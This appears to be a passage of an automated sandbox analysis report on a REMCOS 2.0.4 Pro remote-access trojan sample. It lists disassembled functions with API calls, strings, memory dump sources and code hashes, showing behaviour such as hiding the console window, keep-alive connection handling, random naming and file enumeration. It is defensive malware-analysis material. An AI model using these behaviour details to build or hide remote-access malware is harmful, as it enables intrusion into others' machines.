                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402579
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402582
                                                • CreateThread.KERNEL32(00000000,00000000,004026DD,00419D80,00000000,00000000), ref: 00402599
                                                Strings
                                                • %02i:%02i:%02i:%03i [INFO] , xrefs: 0040254C
                                                • KeepAlive Enabled! Timeout: %i seconds, xrefs: 00402546
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                                • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                                • API String ID: 3715082883-586133315
                                                • Opcode ID: 97c5dfa4d2791e509be96d35347931a4ddd681f8eb6d1e2ed942bf0870862964
                                                • Instruction ID: a544af9e8bc66dbf167339bc81ab0b860872f7a93b4acc1343a57414d3e3f440
                                                • Opcode Fuzzy Hash: 97c5dfa4d2791e509be96d35347931a4ddd681f8eb6d1e2ed942bf0870862964
                                                • Instruction Fuzzy Hash: 67118676900218BFCB11AFD5DC49CFFBB7CBE05706704446AF502E2191D6B8AA44C768
                                                Function 004026EC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62sleeptimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(000003E8), ref: 0040270E
                                                • GetLocalTime.KERNEL32(?), ref: 00402730
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 0040275B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00402766
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402770
                                                • printf.MSVCRT ref: 00402777
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402783
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040278C
                                                Strings
                                                • Timeout expired, resetting connection., xrefs: 00402750
                                                • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402756
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                                • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout expired, resetting connection.
                                                • API String ID: 2756237499-72633004
                                                • Opcode ID: a143496bf836ff020b77559105cbdb0d577391cf88b37496d7c2723147fa54a2
                                                • Instruction ID: a3be9ba1a236e3a87f63a32d95a9ac84625238cc9b2f8b3aa3152655e0709ad0
                                                • Opcode Fuzzy Hash: a143496bf836ff020b77559105cbdb0d577391cf88b37496d7c2723147fa54a2
                                                • Instruction Fuzzy Hash: EB11A275900354AFCB11EFA4D9888EFBBB8BE0470270044BAF643E35C1DA79EA44C768
                                                Function 0040A1EC Relevance: 16.6, APIs: 11, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A1F6
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 0040A20E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 0040A21E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A22D
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A258
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A26E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A284
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A29A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A2B0
                                                  • Part of subcall function 0040A2E7: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A301
                                                  • Part of subcall function 0040A2E7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A318
                                                  • Part of subcall function 0040A2E7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A325
                                                  • Part of subcall function 0040A2E7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A332
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A344
                                                  • Part of subcall function 0040A2E7: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A35F
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A371
                                                  • Part of subcall function 0040A2E7: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A38C
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A39E
                                                  • Part of subcall function 0040A2E7: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A3B9
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A3C2
                                                  • Part of subcall function 0040A2E7: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,0041409C,00000000), ref: 0040A3E3
                                                  • Part of subcall function 0040A2E7: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040A3F5
                                                  • Part of subcall function 0040A2E7: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A402
                                                  • Part of subcall function 0040A2E7: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040A40F
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A419
                                                  • Part of subcall function 0040207B: closesocket.WS2_32(?), ref: 00402080
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A2D3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A2DC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$G@std@@$D@1@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@G@2@@std@@$??4?$basic_string@?find@?$basic_string@FileG@1@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                                • String ID:
                                                • API String ID: 4182931601-0
                                                • Opcode ID: 4b8c786c2a928653d7c78b2a97718db67de5fb97f14792d64cacc02092ef4fff
                                                • Instruction ID: ebdaf62e5d1fa17edd53f487213fbe570907a26ffe3c30d79c9180b86d0f7dda
                                                • Opcode Fuzzy Hash: 4b8c786c2a928653d7c78b2a97718db67de5fb97f14792d64cacc02092ef4fff
                                                • Instruction Fuzzy Hash: 1E216D35A00115ABCF04BBB5DC5A9FE3B38EB44705F4084ADF512A71E1EE389604CB9A
                                                Function 0040D0DF Relevance: 16.6, APIs: 11, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000002,00000000,00000001), ref: 0040D11B
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D125
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 0040D12C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D138
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D144
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A), ref: 0040D14F
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D15E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D173
                                                  • Part of subcall function 004031ED: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00403203
                                                  • Part of subcall function 004031ED: FindFirstFileW.KERNEL32(00000000), ref: 0040320A
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,?,?), ref: 00403237
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00403241
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403258
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403375
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040337E
                                                  • Part of subcall function 004031ED: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403387
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@D@std@@$D@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@Hstd@@V01@@V10@0@V?$basic_string@$D@2@@0@$??2@?length@?$basic_string@CreateDirectoryFileFindFirstG@1@@G@2@@0@V01@Y?$basic_string@
                                                • String ID:
                                                • API String ID: 1908257178-0
                                                • Opcode ID: 409efb9b29ab25040bfe6cb67da4fa2f56f7ed44cd30bfb8f7d61fc6265d70ae
                                                • Instruction ID: 375646913a9a8a1342f7d2a4222f749ec185f0d93e1fb1fc51b43a2be6bb52fd
                                                • Opcode Fuzzy Hash: 409efb9b29ab25040bfe6cb67da4fa2f56f7ed44cd30bfb8f7d61fc6265d70ae
                                                • Instruction Fuzzy Hash: 5021CF729011199FDF04FFA1DC9A9EE7738BB14306F0045BAE502A20A1EE785648CB59
                                                Function 00412670 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • AllocConsole.KERNEL32(75920F10,00419BC8,00000000), ref: 0041267C
                                                • GetConsoleWindow.KERNEL32 ref: 00412682
                                                • ShowWindow.USER32(00000000,00000000), ref: 00412696
                                                • freopen.MSVCRT ref: 004126AF
                                                • printf.MSVCRT ref: 0041275B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWindow$AllocShowfreopenprintf
                                                • String ID: * Breaking-Security.Net$ * REMCOS v$2.0.4 Pro$CONOUT$
                                                • API String ID: 758035570-1312803301
                                                • Opcode ID: fe35d73c3909b68fd663ab14453d9ace36d165e86d489a094a6a4ec23f6f522f
                                                • Instruction ID: 9cf6bf6be2a058413d0ce4d8efc710578c05c633be43f3bb0f60aecc53f80403
                                                • Opcode Fuzzy Hash: fe35d73c3909b68fd663ab14453d9ace36d165e86d489a094a6a4ec23f6f522f
                                                • Instruction Fuzzy Hash: 68210832B002085BCF199F7DECA55AE7A97ABC8752B54817DF80BC72C0DEA44E488648
                                                Function 00411023 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A341,?), ref: 00411032
                                                • time.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A341,?), ref: 0041104A
                                                • srand.MSVCRT ref: 00411057
                                                • rand.MSVCRT ref: 0041106B
                                                • rand.MSVCRT ref: 0041107F
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,0040A341,?), ref: 00411092
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0040A341,?,?,?,?,?,?,?,0040A341,?), ref: 004110A2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040A341,?), ref: 004110AB
                                                Strings
                                                • abcdefghijklmnopqrstuvwxyz, xrefs: 0041103A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                                • String ID: abcdefghijklmnopqrstuvwxyz
                                                • API String ID: 3357298394-1277644989
                                                • Opcode ID: 75c4886a7ca4c2f9da8c9f7a2a1fef184039798116a6aa9502c97216a2d866d2
                                                • Instruction ID: e52e3aa52b5cb3881a484791b4ed8444f345c8503b2a37bd30617961f85d57e2
                                                • Opcode Fuzzy Hash: 75c4886a7ca4c2f9da8c9f7a2a1fef184039798116a6aa9502c97216a2d866d2
                                                • Instruction Fuzzy Hash: 6211A577900219ABCF04EF60EC49AEE7B79EB44312F104026FA01D71D0DB759A46CB68
                                                Function 004025AC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 54timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?,?,00419D80,?,?,?,?,?,?,?,?,?,?,?,0040C7BC), ref: 004025D5
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040C7BC,?,?,?,00419D80), ref: 00402601
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00419D80,?,?,?,?,?,?,?,?,?,?,?,0040C7BC), ref: 0040260C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,00419D80,?,?,?,?,?,?,?,?,?,?,?,0040C7BC), ref: 00402616
                                                • printf.MSVCRT ref: 0040261D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402629
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402632
                                                Strings
                                                • Timeout changed to %i, xrefs: 004025F6
                                                • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 004025FC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                                • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout changed to %i
                                                • API String ID: 1710008465-867111061
                                                • Opcode ID: 305ec9b8a91a4dd133d838243bdb27001714bc761b52a7e71150a5b56fdc88be
                                                • Instruction ID: a55c655ecbc62547e9e979188987b4f8d64e86c80e616b317f6321b1afe19ad7
                                                • Opcode Fuzzy Hash: 305ec9b8a91a4dd133d838243bdb27001714bc761b52a7e71150a5b56fdc88be
                                                • Instruction Fuzzy Hash: 6F117076800214BBCB11AFA5DC49AEFB7BCBF15702F04446BF542E21D0E7B8A645CB68
                                                Function 0040ACB8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040ACC9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004031DE,?), ref: 0040ACD9
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
